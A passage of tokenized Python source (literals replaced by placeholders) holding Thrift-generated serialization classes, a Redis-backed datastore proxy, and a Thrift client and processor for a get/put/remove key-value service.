<EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . row = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . LIST : <EOL> self . mutations = [ ] <EOL> ( _etype3 , _size0 ) = iprot . readListBegin ( ) <EOL> for _i4 in xrange ( _size0 ) : <EOL> _elem5 = Mutation ( ) <EOL> _elem5 . read ( iprot ) <EOL> self . mutations . append ( _elem5 ) <EOL> iprot . readListEnd ( ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . row != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . row ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . mutations != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . LIST , <NUM_LIT:2> ) <EOL> oprot . writeListBegin ( TType . STRUCT , len ( self . mutations ) ) <EOL> for iter6 in self . mutations : <EOL> iter6 . write ( oprot ) <EOL> oprot . writeListEnd ( ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class TRowResult : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . MAP , '<STR_LIT>' , ( TType . STRING , None , TType . STRUCT , ( TCell , TCell . thrift_spec ) ) , None , ) , <EOL> ) <EOL> def __init__ ( self , row = None , columns = None , ) : <EOL> self . row = row <EOL> self . columns = columns <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . row = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . MAP : <EOL> self . columns = { } <EOL> ( _ktype8 , _vtype9 , _size7 ) = iprot . readMapBegin ( ) <EOL> for _i11 in xrange ( _size7 ) : <EOL> _key12 = iprot . readString ( ) ; <EOL> _val13 = TCell ( ) <EOL> _val13 . read ( iprot ) <EOL> self . columns [ _key12 ] = _val13 <EOL> iprot . readMapEnd ( ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . row != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . row ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . columns != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . MAP , <NUM_LIT:2> ) <EOL> oprot . writeMapBegin ( TType . STRING , TType . STRUCT , len ( self . columns ) ) <EOL> for kiter14 , viter15 in self . columns . items ( ) : <EOL> oprot . writeString ( kiter14 ) <EOL> viter15 . write ( oprot ) <EOL> oprot . writeMapEnd ( ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class IOError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:message>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , message = None , ) : <EOL> self . message = message <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . message = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . message != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:message>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . message ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return repr ( self ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class IllegalArgument ( Exception ) : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:message>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , message = None , ) : <EOL> self . message = message <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . message = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . message != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:message>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . message ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return repr ( self ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class AlreadyExists ( Exception ) : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:message>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , message = None , ) : <EOL> self . message = message <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . message = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . message != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:message>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . message ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return repr ( self ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) </s>
<s> import sys <EOL> import base64 <EOL> import redis <EOL> from dbinterface import * <EOL> import sqlalchemy . pool as pool <EOL> import appscale_logger <EOL> ERROR_DEFAULT = "<STR_LIT>" <EOL> DEBUG = False <EOL> FILENAME = "<STR_LIT>" <EOL> FILE = open ( FILENAME , "<STR_LIT:w>" , <NUM_LIT:0> ) <EOL> class DatastoreProxy ( AppDBInterface ) : <EOL> def __init__ ( self , logger = appscale_logger . getLogger ( "<STR_LIT>" ) ) : <EOL> self . logger = logger <EOL> self . masterConn = self . __createMasterConnection ( ) <EOL> self . slaveConn = self . __createLocalConnection ( ) <EOL> def create_table ( self , table_name , columns ) : <EOL> elist = [ ERROR_DEFAULT ] <EOL> if DEBUG : FILE . write ( "<STR_LIT>" ) <EOL> if ( not table_name ) or ( not columns ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> return elist <EOL> cols = '<STR_LIT::>' . join ( columns ) <EOL> key = '<STR_LIT>' + table_name <EOL> conn = self . masterConn <EOL> if ( not conn ) : <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % conn ) <EOL> if ( not conn . exists ( key ) ) : <EOL> conn . set ( key , cols ) <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( cols , key ) ) <EOL> return <NUM_LIT:1> <EOL> else : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( elist ) ) ) <EOL> return elist <EOL> def get_entity ( self , table_name , row_key , column_names ) : <EOL> elist = [ ERROR_DEFAULT ] <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % table_name ) <EOL> if ( not row_key ) or ( not table_name ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" ) <EOL> return elist <EOL> conn = self . slaveConn <EOL> row_key = table_name + '<STR_LIT:/>' + row_key <EOL> data = [ ] <EOL> if ( not conn . exists ( row_key ) ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" % ( table_name , row_key , str ( column_names ) , str ( elist ) ) <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( table_name , row_key , str ( column_names ) , str ( elist ) ) ) <EOL> return elist <EOL> data = conn . hmget ( row_key , column_names ) <EOL> for d in data : <EOL> elist . append ( str ( d ) ) <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( elist ) ) ) <EOL> return elist <EOL> def get_schema ( self , table_name ) : <EOL> elist = [ ERROR_DEFAULT ] <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % table_name ) <EOL> if ( not table_name ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( elist ) ) ) <EOL> return elist <EOL> conn = self . slaveConn <EOL> key = '<STR_LIT>' + table_name <EOL> if ( not conn . exists ( key ) ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> else : <EOL> cols = conn . get ( key ) <EOL> schema = cols . split ( '<STR_LIT::>' ) <EOL> for i in schema : <EOL> elist . append ( str ( i ) ) <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( key , str ( elist ) ) ) <EOL> return elist <EOL> def put_entity ( self , table_name , row_key , column_names , cell_values ) : <EOL> elist = [ ERROR_DEFAULT ] <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % table_name ) <EOL> if ( not row_key ) or ( not table_name ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( elist ) ) ) <EOL> return elist <EOL> if len ( column_names ) != len ( cell_values ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( column_names ) , str ( cell_values ) , str ( elist ) ) ) <EOL> return elist <EOL> conn = self . masterConn <EOL> fields = { } <EOL> key = '<STR_LIT>' + table_name <EOL> old_data = [ ] <EOL> if ( not conn . exists ( key ) ) : <EOL> self . create_table ( table_name , column_names ) <EOL> columns = column_names <EOL> else : <EOL> columns = self . get_schema ( table_name ) [ <NUM_LIT:1> : ] <EOL> old_data = self . get_entity ( table_name , row_key , columns ) <EOL> for i in range ( <NUM_LIT:0> , len ( column_names ) ) : <EOL> fields [ column_names [ i ] ] = cell_values [ i ] <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( fields ) ) ) <EOL> row_key = table_name + '<STR_LIT:/>' + row_key <EOL> if ( conn . hmset ( row_key , fields ) ) : <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % row_key ) ; <EOL> elist . append ( "<STR_LIT:0>" ) <EOL> return elist <EOL> def delete_table ( self , table_name ) : <EOL> elist = [ ERROR_DEFAULT ] <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % table_name ) <EOL> if not table_name : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( elist ) ) ) <EOL> return elist <EOL> conn = self . masterConn <EOL> if ( not conn . exists ( '<STR_LIT>' + table_name ) ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" % table_name <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % table_name ) <EOL> return elist <EOL> pattern = table_name + '<STR_LIT:/>' <EOL> rows = conn . keys ( pattern ) <EOL> for r in rows : <EOL> conn . delete ( r ) <EOL> if ( conn . delete ( '<STR_LIT>' + table_name ) ) : <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % table_name ) <EOL> elist . append ( "<STR_LIT:0>" ) <EOL> return elist <EOL> def delete_row ( self , table_name , row_key ) : <EOL> elist = [ ERROR_DEFAULT ] <EOL> if ( not row_key ) or ( not table_name ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( row_key , table_name , str ( elist ) ) ) <EOL> return elist <EOL> conn = self . masterConn <EOL> row_key = table_name + '<STR_LIT:/>' + row_key <EOL> if ( conn . delete ( row_key ) ) : <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % row_key ) <EOL> elist . append ( "<STR_LIT:0>" ) <EOL> return elist <EOL> def get_table ( self , table_name , column_names = [ ] ) : <EOL> elist = [ ERROR_DEFAULT ] <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % table_name ) <EOL> if ( not table_name ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( elist ) ) ) <EOL> return elist <EOL> conn = self . slaveConn <EOL> if ( not conn . exists ( '<STR_LIT>' + table_name ) ) : <EOL> if DEBUG : FILE . write ( "<STR_LIT>" ) <EOL> return elist <EOL> else : <EOL> columns = self . get_schema ( table_name ) [ <NUM_LIT:1> : ] <EOL> data = [ ] <EOL> pattern = table_name + '<STR_LIT>' <EOL> rows = conn . keys ( pattern ) <EOL> for r in rows : <EOL> data . append ( conn . hmget ( r , columns ) ) <EOL> for d in data : <EOL> for i in d : <EOL> elist . append ( str ( i ) ) <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( elist ) ) ) <EOL> return elist <EOL> def __createLocalConnection ( self ) : <EOL> return redis . Redis ( host = self . get_local_ip ( ) , port = <NUM_LIT> , db = <NUM_LIT:0> ) <EOL> def __createMasterConnection ( self ) : <EOL> return redis . Redis ( host = self . get_master_ip ( ) , port = <NUM_LIT> , db = <NUM_LIT:0> ) </s>
<s> from thrift . Thrift import * <EOL> from ttypes import * <EOL> from thrift . Thrift import TProcessor <EOL> from thrift . transport import TTransport <EOL> from thrift . protocol import TBinaryProtocol <EOL> try : <EOL> from thrift . protocol import fastbinary <EOL> except : <EOL> fastbinary = None <EOL> class Iface : <EOL> def get ( self , store , key ) : <EOL> pass <EOL> def put ( self , store , key , value ) : <EOL> pass <EOL> def remove ( self , store , key ) : <EOL> pass <EOL> class Client ( Iface ) : <EOL> def __init__ ( self , iprot , oprot = None ) : <EOL> self . _iprot = self . _oprot = iprot <EOL> if oprot != None : <EOL> self . _oprot = oprot <EOL> self . _seqid = <NUM_LIT:0> <EOL> def get ( self , store , key ) : <EOL> self . send_get ( store , key ) <EOL> return self . recv_get ( ) <EOL> def send_get ( self , store , key ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = get_args ( ) <EOL> args . store = store <EOL> args . key = key <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_get ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = get_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def put ( self , store , key , value ) : <EOL> self . send_put ( store , key , value ) <EOL> def send_put ( self , store , key , value ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = put_args ( ) <EOL> args . store = store <EOL> args . key = key <EOL> args . value = value <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def remove ( self , store , key ) : <EOL> self . send_remove ( store , key ) <EOL> def send_remove ( self , store , key ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = remove_args ( ) <EOL> args . store = store <EOL> args . key = key <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> class Processor ( Iface , TProcessor ) : <EOL> def __init__ ( self , handler ) : <EOL> self . _handler = handler <EOL> self . _processMap = { } <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_get <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_put <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_remove <EOL> def process ( self , iprot , oprot ) : <EOL> ( name , type , seqid ) = iprot . readMessageBegin ( ) <EOL> if name not in self . _processMap : <EOL> iprot . skip ( TType . STRUCT ) <EOL> iprot . readMessageEnd ( ) <EOL> x = TApplicationException ( TApplicationException . UNKNOWN_METHOD , '<STR_LIT>' % ( name ) ) <EOL> oprot . writeMessageBegin ( name , TMessageType . EXCEPTION , seqid ) <EOL> x . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> return <EOL> else : <EOL> self . _processMap [ name ] ( self , seqid , iprot , oprot ) <EOL> return True <EOL> def process_get ( self , seqid , iprot , oprot ) : <EOL> args = get_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = get_result ( ) <EOL> result . success = self . _handler . get ( args . store , args . key ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> def process_put ( self , seqid , iprot , oprot ) : <EOL> args = put_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> self . _handler . put ( args . store , args . key , args . value ) <EOL> return <EOL> def process_remove ( self , seqid , iprot , oprot ) : <EOL> args = remove_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> self . _handler . remove ( args . store , args . key ) <EOL> return <EOL> class get_args : <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:store>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . STRING , '<STR_LIT:key>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , d = None ) : <EOL> self . store = None <EOL> self . key = None <EOL> if isinstance ( d , dict ) : <EOL> if '<STR_LIT:store>' in d : <EOL> self . store = d [ '<STR_LIT:store>' ] <EOL> if '<STR_LIT:key>' in d : <EOL> self . key = d [ '<STR_LIT:key>' ] <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . store = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . STRING : <EOL> self . key = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . store != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:store>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . store ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . key != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:key>' , TType . STRING , <NUM_LIT:2> ) <EOL> oprot . writeString ( self . key ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return str ( self . __dict__ ) <EOL> def __repr__ ( self ) : <EOL> return repr ( self . __dict__ ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class get_result : <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . STRUCT , '<STR_LIT:success>' , ( value_t , value_t . thrift_spec ) , None , ) , <EOL> ) <EOL> def __init__ ( self , d = None ) : <EOL> self . success = None <EOL> if isinstance ( d , dict ) : <EOL> if '<STR_LIT:success>' in d : <EOL> self . success = d [ '<STR_LIT:success>' ] <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . STRUCT : <EOL> self . success = value_t ( ) <EOL> self . success . read ( iprot ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . STRUCT , <NUM_LIT:0> ) <EOL> self . success . write ( oprot ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return str ( self . __dict__ ) <EOL> def __repr__ ( self ) : <EOL> return repr ( self . __dict__ ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class put_args : <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:store>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . STRING , '<STR_LIT:key>' , None , None , ) , <EOL> ( <NUM_LIT:3> , TType . STRING , '<STR_LIT:value>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , d = None ) : <EOL> self . store = None <EOL> self . key = None <EOL> self . value = None <EOL> if isinstance ( d , dict ) : <EOL> if '<STR_LIT:store>' in d : <EOL> self . store = d [ '<STR_LIT:store>' ] <EOL> if '<STR_LIT:key>' in d : <EOL> self . key = d [ '<STR_LIT:key>' ] <EOL> if '<STR_LIT:value>' in d : <EOL> self . value = d [ '<STR_LIT:value>' ] <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , 